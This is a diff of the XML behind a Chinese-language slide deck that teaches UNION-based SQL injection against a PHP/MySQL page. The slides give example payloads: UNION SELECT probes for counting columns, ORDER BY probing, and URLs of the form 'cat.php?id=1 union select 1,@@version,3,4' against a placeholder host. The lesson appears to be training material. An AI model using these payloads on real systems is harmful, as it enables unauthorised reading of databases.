-                </a:solidFill>
-              </a:rPr>
-              <a:t>错</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>]</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx2"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              <a:t>。</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
               <a:buNone/>
             </a:pPr>
             <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>查询语句的前面部分我们无法修改，因为这些是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>PHP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>中的代码。然而，我们可以利用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>尝试其它表格的信息</a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>尝试</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>    </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>id,name,price</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> FROM articles where id=1 UNION SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1,2—— </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>将</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>报</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>错</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>]</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx2"/>
-              </a:solidFill>
-            </a:endParaRPr>
+              <a:t>。</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -7241,111 +7378,29 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>尝试</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>id,name,price</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> FROM articles where id=1 UNION SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1,2,3——</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>没有</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>报</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>错</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx2"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>]</a:t>
-            </a:r>
+              <a:t>利用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>开发：</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
               <a:buNone/>
             </a:pPr>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="tx2"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注：这个是</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>MYSQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>方法理论，与其它数据库可能不同。</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>1,2,3……</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>可以换成</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>null,null,null</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>……</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>，</a:t>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	a.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>利用</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
@@ -7353,8 +7408,61 @@
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>两端的字段类型需要一致（或兼容）。</a:t>
-            </a:r>
+              <a:t>试探出列的数量</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	b.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>找出显示的列</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	c.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>尝试出数据库</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>meta-tables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>中的信息</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>	d.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>尝试出其它数据库或表中的信息</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="0" indent="0">
@@ -7370,7 +7478,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1529536779"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3201757849"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7448,7 +7556,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="913774" y="1850834"/>
-            <a:ext cx="10698004" cy="3940365"/>
+            <a:ext cx="10698004" cy="4331602"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -7461,32 +7569,97 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>利用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>ORDER BY</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>，我们可试出字段名。</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
+              <a:t>有</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>两种方法可以试出列的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
+              <a:t>数量：</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>①</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>UNION SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>并</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
+              <a:t>增加</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>列的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
+              <a:t>数量</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>②</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>ORDER </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
+              <a:t>BY</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257913969"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3260897345"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7563,36 +7736,318 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="771181" y="1850834"/>
-            <a:ext cx="10840597" cy="3940365"/>
+            <a:off x="913774" y="1583140"/>
+            <a:ext cx="10698004" cy="4558353"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>4.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>试信息</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
             <a:pPr marL="0" indent="0">
               <a:buNone/>
             </a:pPr>
             <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>①使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>并增加列的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>数量</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>源</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语句如下：</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
-            </a:r>
+              <a:t>	SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>id,name,price</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> FROM articles where id=1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>利用</a:t>
+              <a:t>尝试</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>id,name,price</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> FROM articles where id=1 UNION SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>1—— </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>将</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>报</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>错</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>]</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx2"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>尝试</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>id,name,price</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> FROM articles where id=1 UNION SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>1,2—— </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>将</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>报</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>错</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>]</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx2"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>尝试</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>id,name,price</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> FROM articles where id=1 UNION SELECT </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>1,2,3——</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>没有</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>报</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>错</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx2"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION SELECT</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语句并增加列数。如果</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>语句连接的两个查询返回的列数不同，数据库会报错。因此可以通过这个方法来猜测列数 </a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx2"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>注：这个是</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
@@ -7600,69 +8055,35 @@
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>自带的函数</a:t>
+              <a:t>方法理论，与其它数据库可能不同。</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>1,2,3……</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>可以换成</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>current_user</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>(),version()</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>和</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>database()</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>构建如下：</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
-              <a:t>http://www.vulnerable.com/cat.php?id=1%20union%20select%201,@@version,3,4</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
-              <a:t>http://www.vulnerable.com/cat.php?id=1%20union%20select%201,version%28%29,3,4</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>我们查到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>MYSQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>的版本号</a:t>
+              <a:t>null,null,null</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>……</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>UNION</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>两端的字段类型需要一致（或兼容）。</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -7679,7 +8100,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790884363"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1529536779"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -7708,267 +8129,178 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="内容占位符 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913774" y="1685581"/>
-            <a:ext cx="10720038" cy="4671152"/>
